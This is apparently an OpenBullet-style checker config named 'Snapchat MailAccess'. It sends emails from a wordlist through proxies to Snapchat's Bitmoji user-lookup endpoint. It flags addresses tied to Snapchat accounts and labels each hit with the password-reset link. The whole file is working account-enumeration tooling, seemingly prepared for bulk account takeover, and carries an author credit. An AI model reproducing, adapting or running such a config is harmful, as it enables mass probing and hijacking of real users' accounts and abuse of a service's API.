[SETTINGS]
{
  "Name": "Snapchat MailAccess",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-01-16T16:39:27.1334598+01:00",
  "AdditionalInfo": "",
  "Author": "",
  "Version": "1.4.3 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "Start Booy !",
      "VariableName": "Snap-Chat",
      "Id": 2082927024
    }
  ],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#AUTH_1 REQUEST POST "https://bitmoji.api.snapchat.com/api/user/find" 
  CONTENT "{\"email\":\"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: fr-FR,fr;q=0.9" 
  HEADER "cache-control: no-cache" 
  HEADER "content-length: 35" 
  HEADER "content-type: application/json;charset=UTF-8" 
  HEADER "origin: https://www.bitmoji.com" 
  HEADER "pragma: no-cache" 
  HEADER "referer: https://www.bitmoji.com/" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: cross-site" 
  HEADER "sec-gpc: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 

#CHECK KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"account_type\":\"snapchat\"}" 
  KEYCHAIN Failure OR 
    KEY "account_type\":\"bitmoji\"}" 
    KEY "<RESPONSECODE>" EqualTo "204" 

#Capture_1 FUNCTION Constant "True ✔" -> VAR "is Mail Access" 

#Capture_2 FUNCTION Constant "accounts.snapchat.com/accounts/password_reset_options" -> VAR "Reset Link " 

#CREDIT_ FUNCTION Constant "themutualguy" -> VAR "BY : " 

